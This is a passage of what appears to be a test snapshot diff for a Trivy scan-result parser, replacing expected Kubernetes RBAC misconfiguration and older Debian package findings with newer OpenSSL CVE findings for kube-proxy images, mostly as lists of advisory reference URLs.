"https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2097", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-2097", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", + "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", + "https://linux.oracle.com/cve/CVE-2022-2097.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", + "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220715-0011/", + "https://security.netapp.com/advisory/ntap-20230420-0008/", + "https://ubuntu.com/security/notices/USN-5502-1", + "https://www.cve.org/CVERecord?id=CVE-2022-2097", + "https://www.debian.org/security/2023/dsa-5343", + "https://www.openssl.org/news/secadv/20220705.txt", ], }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "category": "Vulnerability", + "description": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "AES OCB fails to encrypt some bytes", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://avd.aquasec.com/nvd/cve-2022-2097", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://access.redhat.com/security/cve/CVE-2022-2097", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://bugzilla.redhat.com/2081494", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/local-path-provisioner-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV045", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv045", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits wildcard verb on specific resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=local-path-provisioner-role", - "mitigation": "Create a role which does not permit wildcard verb on specific resources", - "name": "No wildcard verb roles(Role permits wildcard verb on specific resources)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv045", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://bugzilla.redhat.com/2087913", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/local-path-provisioner-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=local-path-provisioner-role", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'local-path-provisioner-role' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://bugzilla.redhat.com/2104905", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV050", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv050", - ], - }, - "category": "Misconfiguration", - "description": "An effective level of access equivalent to cluster-admin should not be provided.", - "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", - "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", - "name": "Do not allow management of RBAC resources(ClusterRole 'securecodebox-manager-role' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv050", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV050", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv050", - ], - }, - "category": "Misconfiguration", - "description": "An effective level of access equivalent to cluster-admin should not be provided.", - "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", - "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", - "name": "Do not allow management of RBAC resources(ClusterRole 'securecodebox-manager-role' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv050", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3374", - "installedVersion": "1.8.2.2", - "packageName": "apt", - "references": [ - "https://access.redhat.com/security/cve/cve-2011-3374", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", - "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", - "https://seclists.org/fulldisclosure/2011/Sep/221", - "https://security-tracker.debian.org/tracker/CVE-2011-3374", - "https://snyk.io/vuln/SNYK-LINUX-APT-116518", - "https://ubuntu.com/security/CVE-2011-3374", - ], - }, - "category": "Vulnerability", - "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3374", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2011-3374", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, { "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, { "type": "URL", - "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, { "type": "URL", - "value": "https://seclists.org/fulldisclosure/2011/Sep/221", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", }, { "type": "URL", - "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "value": "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2011-3374", + "value": "https://linux.oracle.com/cve/CVE-2022-2097.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-37600", - "installedVersion": "1:2.33.1-0.1", - "packageName": "bsdutils", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-37600", - "https://github.com/karelzak/util-linux/commit/1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c", - "https://github.com/karelzak/util-linux/issues/1395", - "https://nvd.nist.gov/vuln/detail/CVE-2021-37600", - "https://security.netapp.com/advisory/ntap-20210902-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-37600", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** An integer overflow in util-linux through 2.37.1 can potentially cause a buffer overflow if an attacker were able to use system resources in a way that leads to a large number in the /proc/sysvipc/sem file. NOTE: this is unexploitable in GNU C Library environments, and possibly in all realistic environments.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "util-linux: integer overflow can lead to buffer overflow in get_sem_elements() in sys-utils/ipcutils.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-37600", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-37600", + "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", }, { "type": "URL", - "value": "https://github.com/karelzak/util-linux/commit/1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", }, { "type": "URL", - "value": "https://github.com/karelzak/util-linux/issues/1395", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-37600", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210902-0002/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-37600", + "value": "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "1:2.33.1-0.1", - "packageName": "bsdutils", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + "value": "https://security.netapp.com/advisory/ntap-20220715-0011/", }, { "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "value": "https://security.netapp.com/advisory/ntap-20230420-0008/", }, { "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://ubuntu.com/security/notices/USN-5502-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2097", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://www.debian.org/security/2023/dsa-5343", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://www.openssl.org/news/secadv/20220705.txt", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2016-2781", - "installedVersion": "8.30-3", - "packageName": "coreutils", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4304", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "http://seclists.org/oss-sec/2016/q1/452", - "http://www.openwall.com/lists/oss-security/2016/02/28/2", - "http://www.openwall.com/lists/oss-security/2016/02/28/3", - "https://access.redhat.com/security/cve/CVE-2016-2781", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lore.kernel.org/patchwork/patch/793178/", - "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", - "https://www.cve.org/CVERecord?id=CVE-2016-2781", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4304", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", + "https://linux.oracle.com/cve/CVE-2022-4304.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", + "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4304", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", + "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "coreutils: Non-privileged session can escape to the parent session in chroot", + "name": "timing attack in RSA Decryption implementation", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2016-2781", + "value": "https://avd.aquasec.com/nvd/cve-2022-4304", }, { "type": "URL", - "value": "http://seclists.org/oss-sec/2016/q1/452", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "value": "https://access.redhat.com/security/cve/CVE-2022-4304", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2016-2781", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://lore.kernel.org/patchwork/patch/793178/", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-18018", - "installedVersion": "8.30-3", - "packageName": "coreutils", - "references": [ - "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", - "https://access.redhat.com/security/cve/CVE-2017-18018", - "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", - "https://www.cve.org/CVERecord?id=CVE-2017-18018", - ], - }, - "category": "Vulnerability", - "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "coreutils: race condition vulnerability in chown and chgrp", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-18018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-18018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.19.8", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1664", - "installedVersion": "1.19.7", - "packageName": "dpkg", - "references": [ - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", - "https://lists.debian.org/debian-security-announce/2022/msg00115.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", - "https://security.netapp.com/advisory/ntap-20221007-0002/", - "https://ubuntu.com/security/notices/USN-5446-1", - "https://ubuntu.com/security/notices/USN-5446-2", - ], - }, - "category": "Vulnerability", - "description": "Dpkg::Source::Archive in dpkg, the Debian package management system, before version 1.21.8, 1.20.10, 1.19.8, 1.18.26 is prone to a directory traversal vulnerability. When extracting untrusted source packages in v2 and v3 source package formats that include a debian.tar, the in-place extraction can lead to directory traversal situations on specially crafted orig.tar and debian.tar tarballs.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "Dpkg::Source::Archive in dpkg, the Debian package management system, b ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": 